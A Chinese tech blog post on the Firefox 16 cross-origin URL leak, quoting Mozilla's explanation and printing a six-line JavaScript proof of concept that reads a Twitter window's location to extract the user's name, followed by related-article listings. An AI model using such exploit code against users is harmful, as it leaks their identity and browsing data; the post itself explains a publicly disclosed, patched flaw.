Firefox 16隐私漏洞的攻击方法

最新推荐文章于 2024-09-15 22:55:21 发布
最新推荐文章于 2024-09-15 22:55:21 发布
阅读量2.5k 收藏
点赞数 1
分类专栏: Web开发 浏览器 文章标签: firefox mozilla function twitter url 浏览器
火狐浏览器前几天发布了最新的Firefox 16正式版,但是在刚发布一天,就爆出了重大安全漏洞,接着Mozilla在官方首页上移除了Firefox 16的下载链接,转而继续提供Firefox 15.0.1版本。

Mozilla这样解释:“该漏洞可能允许恶意网站获取用户的访问记录,窃取URL或URL参数,不过目前还没有迹象表明这个漏洞已经被人利用。”

下面是利用该漏洞获取用户信息的攻击代码,很简单,只需6行:

function poc(){
	var win = window.open('https://twitter.com/lists/', 'newWin', 'width=200, height=200');
	setTimeout(function(){
		alert('Hello '+/^https:\/\/twitter.com\/([^/]+)/.exec(win.location)[1])
	}, 5000);
}

这个代码演示了使用Firefox 16的漏洞收集Twitter用户的用户名。当然,还可以干很多事!!!

chszs
关注
专栏目录
我理解的回调与同源方法执行漏洞(SOME)浅析
9ian1i
12-23 2012
0x00 before以前一直对回调有些迷糊,似懂非懂,虽然能明白用法和原理,但总有些小疑问,比如,为啥偏要用回调。今天集中看了很多博客,再配合上SOME的理解,感觉收获颇多,故给大家一起分享。0x01 什么是JS的回调函数见网上有人说:函数a有一个参数,这个参数是个函数b,当函数a执行完以后执行函数b。那么这个过程就叫回调。其实并不全对,函数a执行过程中执行了函数b,那也是回调。在我觉得回调的关键
新版火狐网页浏览器可拦截加密挖矿攻击
区块链铅笔
04-10 407
点击上方“蓝色字”可关注我们!暴走时评:据报道,火狐在其新的浏览器版本中推出了针对加密挖矿恶意软件的新保护措施。新的浏览功能是与隐私和安全软件公司Disconnect合作...
利用Powershell Empire和CVE-2016-0189攻击用户的IE浏览器
moonhillcity的博客
10-21 2802
前言 Empire(http://www.powershellempire.com/)是一个PowerShell后期漏洞利用代理工具,它建立在密码学、安全通信和灵活的架构之上。Empire实现了无需powershell.exe就可运行PowerShell代理的功能,它可以快速部署后期漏洞利用模块,并且能够躲避网络检测。 因此,Powershell Empire是我们最喜欢的一款工具,尤
DNP3执行漏洞
ICS-CERT
12-17 1980
工业上比较常用的通信协议,在很多自动化厂商的产品中出现了漏洞! http://www.ics-cert.com.cn/?p=110
Firefox火狐浏览器官方Setup 45.0-win64版本exe安装包
01-02
综上所述,Firefox火狐浏览器45.0-win64版本提供了一套全面的浏览解决方案,注重用户体验、隐私保护和安全性,结合其强大的扩展能力和自定义选项,成为众多用户的选择。通过下载并安装"Firefox Setup 45.0.exe"文件...
Firefox火狐浏览器官方45.0.2-win32版本exe安装包
12-24
Firefox火狐浏览器45.0.2-win32版本详解》 Firefox,这款由Mozilla基金会开发的开源网络浏览器,自2004年首次亮相以来,就以其强大的功能、高度的可定制性和对用户隐私的重视赢得了全球用户的喜爱。在本文中,...
Firefox火狐浏览器官方84.0-mac版本dmg安装包
12-28
Firefox火狐浏览器是一款全球知名的开源网络浏览器,以其强大的安全性和高度的可定制性深受用户喜爱。84.0是该浏览器的一个稳定版本,为用户提供了一系列的改进和新特性。在这个mac版本的安装包中,我们关注的重点是...
Firefox火狐浏览器官方Setup 52.0.2-win64版本exe安装包
01-02
Firefox火狐浏览器52.0.2-win64版本安装详解》 Firefox火狐浏览器,作为一款全球知名的开源网络浏览器,以其强大的功能、高度的定制性和安全性深受用户喜爱。52.0.2-win64是Firefox针对Windows 64位系统的一个...
Firefox火狐浏览器官方Setup 68.5.0esr-win64版本exe安装包
01-02
Firefox火狐浏览器,由Mozilla基金会开发,是一款开源、免费的网络浏览器,以其强大的安全性、隐私保护和高度可定制性著称。本资源是Firefox 68.5.0esr-win64的安装包,专为64位Windows系统设计,提供了稳定且优化的...
Firefox 浏览器爆严重漏洞-CVE-2019-11707
大哥一声吼
06-21 1881
CVE-2019-11707 漏洞
CVE-2011-0065 Firefox mChannel UAF漏洞
君子谬
03-06 1697
软件名称: Firefox 软件版本:Firefox 3.6.16 漏洞模块:xul.dll 操作系统:windows XP/7/8/8.1 漏洞编号:CVE-2011-0065 危害等级:高危 漏洞类型:释放重引用 威胁类型:远程 1. 软件简介      Mozilla Firefox是一款非常流行的开源WEB浏览器。SeaMonkey是开源的Web浏览器、邮件和
Jsonp常见安全漏洞分析
lifushan123的专栏
05-12 2948
JSONP(JSON with Padding)是资料格式 JSON 的一种“使用模式”,可以让网页从别的网域要资料。这个解释来自于互联网上面的答案。jsonp只是 一种使用json模式,之所以能够很广泛使用。主要用它来解决跨域访问问题。可以方便跨域名传输数据。一些是一个jsonp的例子。但是,正确的使用jsonp是至关重要的,用得不好。将带来重要资料把超范围访问,还会带来各自xss漏洞
Pingback漏洞利用技术
Exploit的小站~
08-02 9941
0x00 废话在做内部扫描的过程中,有些POC带有无回显识别功能时,漏洞扫描发payload的时候会把这个callback地址插入到HTTP报文的任意地方进行发送探测漏洞,时间久了,就发现回显后台中有很多不知所云的DNS或者HTTP的log,遇到这种情况并不好排查,往往不了了之。但现在这种情况深入分析是有存在漏洞的风险的,我姑且称其为Pingback漏洞。以下是BH2017相关议题的一些总结。0x0
Firefox出现大漏洞 黑客恐取得系统层权限执行任何指令
mondy1989的博客
02-02 1231
Mozilla发出安全公告揭露Firefox56到58版存在一个能让未经验证的远程攻击者在受害系统上执行程序代码的漏洞Mozilla已经释出更新版Firefox解决问题。 文章出自:SBF999胜博发娱乐时代 http://www.iselex.com/ 这项编号为CVE-2018-5124的漏洞是由Mozilla研究人员Johann Hofmann通报,它存在于Firefox
微服务容错及解决
2302_80490510的博客
09-14 818
微服务保护的技术有很多,但在目前国内使用较多的还是Sentinel,所以接下来我们学习Sentinel的使用Sentinel是阿里巴巴开源的一款服务保护框架,目前已经加入SpringCloudAlibaba中。核心库(Jar包):不依赖任何框架/库,能够运行于 Java 8 及以上的版本的运行时环境,同时对 Dubbo / Spring Cloud 等框架也有较好的支持。在项目中引入依赖即可实现服务限流、隔离、熔断等功能。控制台。
使用Apify加载Twitter消息以进行微调的完整指南
nseejrukjhad的博客
09-15 346
通过本文,我们展示了如何使用Apify从Twitter抓取数据并准备进行微调。Apify官方文档Twitter API文档。
基于大模型技术的算力产业监测服务平台设计
最新发布
09-17
内容概要:本文提出了一种新型算力产业监测服务平台的设计理念,运用国内自主研发的大模型技术支持,通过对传统技术的改进和完善,提出了三层架构的设计方法,即基础设施层(含向量数据库和模型训练)、大模型应用框架层(强化数据处理与多维关系挖掘)及业务层(如智能分析助手)。这种设计方案旨在提高算力产业发展监测与决策制定的质量。 适合人群:电信行业的从业人员及研究人员;算力产业链各环节管理者;政府相关机构和政策决策者。 使用场景及目标:在多种算力相关的应用场景(如云计算中心管理,数据中心监测,政策分析)中辅助决策者进行快速有效的信息获取和技术选择;助力算力产业发展方向的精确把控和战略调整。 其他说明:随着大模型技术的日臻成熟,该算力产业监测服务平台预计将进一步丰富自身的应用领域和服务深度,以促进算力行业更智慧化发展。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值